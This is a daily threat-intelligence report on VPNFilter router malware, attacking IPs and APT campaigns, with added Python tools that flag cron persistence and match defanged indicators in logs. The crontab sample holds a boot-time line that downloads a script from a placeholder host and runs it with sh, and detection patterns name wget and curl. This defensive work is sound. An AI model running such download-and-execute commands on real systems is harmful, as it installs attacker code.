Last Updated: 3:44PM EST
As you may know we have been putting out a daily MSS report on what activity we have seen in the past 24 hours. This allows other managed security providers to see if they too are experiencing the same attacks and to report attacks to Jigsaw Security's SOC. The goal is to give visibility into items of interest to managed security providers. If you have information you would like to contribute please use the chat function on our website to talk to an analyst.
We continue to see botnet activity looking for telnet logins on IoT devices. Specifically, we are seeing VPNFilter activity. VPNFilter is malware infecting a number of different kinds of network routers, and it seems to be designed specifically to target serial networking devices that use the Modbus protocol to talk to and control industrial hardware, as in factories and warehouses. The malware has special, dedicated code to target control systems using SCADA.
The malware uses default credentials to infect the machines, meaning that it can be avoided by changing passwords and other security on devices.
This software actually installs itself in multiple stages:
Stage 1 involves a worm component that adds itself to the crontab, the list of tasks the cron scheduler on Linux runs at regular intervals. This allows it to remain on the device and to re-infect it with the subsequent stages if they are removed.
Stage 2 is the actual body of the malware, including the basic code that carries out all normal functions and executes any instructions requested by special, optional Stage 3 modules.
Stage 3 can be any of various "modules" that tell the malware to do specific things, like spying on industrial control devices (Modbus SCADA) or using secure "dark web" Tor software to communicate via encryption.
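Because Stage 1 persists through the crontab, reviewing cron entries on a suspect Linux host is one of the few checks a defender can run without vendor tooling. The following is an added example written for this report, not code from Jigsaw Security or from any VPNFilter analysis: it parses a user crontab (comments, environment lines, `@reboot`-style shortcuts and five-field schedules) and flags entries that run from volatile or hidden directories or that fetch content from the network and hand it to a shell. The heuristics and the sample crontab are constructed assumptions for illustration; they are generic persistence patterns, not the specific entries VPNFilter writes.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample crontab for this example (not captured from a real device).
# The download URL is a deliberate placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /var/run/.x/keeper >/dev/null 2>&1
@reboot wget -q -O /tmp/s http://EXAMPLE-PLACEHOLDER.invalid/s && sh /tmp/s
30 6 * * 1 /usr/sbin/ntpdate pool.ntp.org
"""

SCHEDULE_SHORTCUTS = {"@reboot", "@yearly", "@annually", "@monthly",
                      "@weekly", "@daily", "@midnight", "@hourly"}
# Directories that are world-writable or cleared at boot: legitimate cron jobs
# rarely execute binaries that live there.
VOLATILE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/var/run/", "/run/")
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
SHELL_EXEC = re.compile(r"\b(sh|bash|ash)\b")
HIDDEN_DIR = re.compile(r"/\.[^/\s]+/")


@dataclass
class CronEntry:
    line_no: int
    schedule: str
    command: str


def parse_crontab(text: str) -> List[CronEntry]:
    """Parse a user-style crontab (no user column) into schedule/command pairs."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Environment assignments such as PATH=... or MAILTO="" are not jobs.
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2 and parts[0] in SCHEDULE_SHORTCUTS:
                entries.append(CronEntry(n, parts[0], parts[1]))
            continue
        parts = line.split(None, 5)
        if len(parts) != 6:
            continue  # malformed: needs five schedule fields plus a command
        entries.append(CronEntry(n, " ".join(parts[:5]), parts[5]))
    return entries


def suspicious_reasons(entry: CronEntry) -> List[str]:
    """Return the reasons an entry looks like persistence; empty list means clean.

    'What' reasons (where/how the command runs) decide whether an entry is
    flagged; 'when' reasons (schedule) are attached as supporting context only.
    """
    what, when = [], []
    cmd = entry.command
    if any(d in cmd for d in VOLATILE_DIRS):
        what.append("executes or writes under a volatile/writable directory")
    if HIDDEN_DIR.search(cmd):
        what.append("references a hidden directory")
    if FETCH_TOOLS.search(cmd) and SHELL_EXEC.search(cmd):
        what.append("downloads content and hands it to a shell")
    if not what:
        return []
    if entry.schedule == "@reboot":
        when.append("runs at every boot")
    m = re.match(r"^\*/(\d+)\s", entry.schedule)
    if m and int(m.group(1)) <= 5:
        when.append(f"runs every {m.group(1)} minutes")
    return what + when


def review_crontab(text: str) -> List[dict]:
    """Parse a crontab and return one finding per suspicious entry."""
    findings = []
    for entry in parse_crontab(text):
        reasons = suspicious_reasons(entry)
        if reasons:
            findings.append({"line": entry.line_no, "schedule": entry.schedule,
                             "command": entry.command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in review_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

On a live host you would feed `crontab -l` output (per user) and the contents of `/etc/cron.d/*` into `review_crontab`; system crontab files carry an extra user column, so strip it before parsing. A flagged entry is a lead for a file-system and network review, and on an embedded router the practical remediation remains the factory reset described below.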
Both Cisco and Symantec suggest that people who own affected devices do a factory reset. That is typically accomplished by using a small, pointed object, such as a straightened-out paperclip, to push the small reset button on the back of the unit for 10 to 30 seconds (time varies by model). This will remove the malware, but it also restores the router to all original settings.
Before connecting the factory-reset router to the internet again, the device's default passwords should be changed to prevent reinfection.
See the affected devices list below to see if your router is on the list. The FBI has taken a high-profile role in addressing this malware, conducting an investigation that resulted in the seizure of the domain name toknowall[.]com and using it to redirect queries from the stage one infection which has allowed the FBI to identify servers that are being used in this attack.
We have been consistently seeing attacks from 205.185.113[.]213 and they continue today. As previously reported, this IP is running EXPLOIT Remote Command Execution via Shell Scripts against various targets. In addition, we are still seeing 104.244.76[.]219, which is running EXPLOIT Netcore Router Backdoor access attempts. This activity is still being seen.
We continue to see the ZTorg malware affecting mobile phones; it remains an issue.
We continue to see LDPinch activity as well as some redirection of some of the infrastructure identified as LDPinch.
While APT15 is one of the lesser-talked-about threats, we have confirmed that the group is active and that new attacks have been carried out. Most of the activity surrounding this group has been observed attacking UK-based companies. Over the past few days numerous media reports have indicated that the group is very active; we have been seeing this activity since early May.
We have been seeing reports of LuckyMouse attacking government websites and targeting government-related organizations. We have deployed protection to stop these attacks after seeing APT27 active, and we believe the campaigns may be related based on intelligence. Most of this activity is centered around the bbs.sonypsps[.]com domain and has been widely reported. Events 28729 and 28682 both cover this event and the surrounding activity. AlienVault OTX has additional indicators of average fidelity. We have expanded the event to include information uncovered by Jigsaw Security researchers. Customers can download the indicators, but they are already active in the FirstWatch sensor and will trigger if any activity is observed on your networks.
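The indicators in this report are published defanged (`[.]` in place of `.`), so they cannot be grepped straight out of firewall, DNS or proxy logs. The following is an added example, not part of the original report or of Jigsaw Security's tooling: it refangs the four indicators that appear above (the two attacking IPs, the seized toknowall[.]com domain and the bbs.sonypsps[.]com domain), extracts IPs and hostnames from each log line, and reports a hit on an exact match or on a subdomain of an indicated domain. The log lines are constructed for the example, with RFC 5737 documentation addresses standing in for the internal network, and the short descriptions attached to each indicator are taken from the report text above.

```python
import re
from typing import Dict, List

# Indicators exactly as they appear in the report, in defanged form, with the
# activity the report associates with each one.
REPORT_INDICATORS: Dict[str, str] = {
    "205.185.113[.]213": "EXPLOIT Remote Command Execution via Shell Scripts",
    "104.244.76[.]219": "EXPLOIT Netcore Router Backdoor access attempts",
    "toknowall[.]com": "VPNFilter stage 1 domain (seized by the FBI)",
    "bbs.sonypsps[.]com": "LuckyMouse / APT27 activity",
}

# Constructed log lines for this example; 203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges used here as the monitored network.
SAMPLE_LOGS = [
    "Jun 14 09:12:01 fw01 kernel: DROP IN=eth0 SRC=205.185.113.213 DST=203.0.113.10 PROTO=TCP DPT=23",
    "Jun 14 09:12:07 fw01 kernel: ACCEPT IN=eth0 SRC=198.51.100.7 DST=203.0.113.10 PROTO=TCP DPT=443",
    "Jun 14 09:13:44 dns01 named: client 203.0.113.22#51523: query: toknowall.com IN A",
    "Jun 14 09:14:02 proxy01 squid: 203.0.113.30 GET http://bbs.sonypsps.com/ - DIRECT",
    "Jun 14 09:15:19 fw01 kernel: DROP IN=eth0 SRC=104.244.76.219 DST=203.0.113.10 PROTO=TCP DPT=80",
]

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Hostnames: dotted labels ending in an alphabetic TLD, so dotted IPs never match.
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def refang(indicator: str) -> str:
    """Undo common defanging so an indicator can be compared with raw log text."""
    return (indicator.replace("[.]", ".")
                     .replace("(.)", ".")
                     .replace("hxxp", "http")
                     .lower())


def scan_logs(lines: List[str], indicators: Dict[str, str]) -> List[dict]:
    """Return one hit per (line, indicator) where a log line contains an indicator."""
    table = {refang(k): (k, desc) for k, desc in indicators.items()}
    domains = [v for v in table if not IP_RE.fullmatch(v)]
    hits = []
    for n, line in enumerate(lines, 1):
        ips = set(IP_RE.findall(line))
        hosts = {h.lower() for h in HOST_RE.findall(line)}
        matched = set()
        for ip in ips:
            if ip in table:
                matched.add(ip)
        for host in hosts:
            if host in table:
                matched.add(host)
            else:
                # A query for www.example.com should hit an indicator for example.com.
                for d in domains:
                    if host.endswith("." + d):
                        matched.add(d)
        for value in sorted(matched):
            original, desc = table[value]
            hits.append({"line": n, "indicator": original, "description": desc})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, REPORT_INDICATORS):
        print(f"line {hit['line']}: {hit['indicator']} -> {hit['description']}")
```

Because hits are reported with the indicator still in its defanged form, the output can be pasted back into a ticket or a report like this one without creating live links. For bulk use, replace `SAMPLE_LOGS` with lines read from the firewall, DNS and proxy feeds and extend `REPORT_INDICATORS` with the downloaded event indicators.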
FakeSpy Android Malware:
We have added the FakeSpy Android malware detection to the FirstWatch sensor.
Note: This report may be updated throughout the day!